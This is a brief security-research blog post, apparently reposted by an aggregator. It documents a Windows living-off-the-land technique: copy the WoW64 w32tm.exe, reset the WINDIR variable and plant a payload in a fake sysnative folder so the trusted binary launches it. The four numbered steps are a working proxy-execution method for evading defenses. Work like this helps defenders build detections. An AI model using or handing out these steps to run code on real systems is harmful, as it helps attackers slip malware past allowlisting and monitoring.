Lolbin Wow Ltd x 2
2024-3-17 06:18:38 Author: www.hexacorn.com(查看原文) 阅读量:19 收藏

I have already covered cases where I abused WINDIR environment variable to LOLBINize some WoW executables.

I thought I covered w32tm.exe before, but looking at my blog history I can’t find any reference to it.

So, here it is:

  1. copy c:\WINDOWS\SysWOW64\w32tm.exe .
  2. set windir=c:\test
  3. drop payload as c:\test\sysnative\w32tm.exe
  4. execute c:\test\w32tm.exe

文章来源: https://www.hexacorn.com/blog/2024/03/16/lolbin-wow-ltd-x-2/
如有侵权请联系:admin#unsafe.sh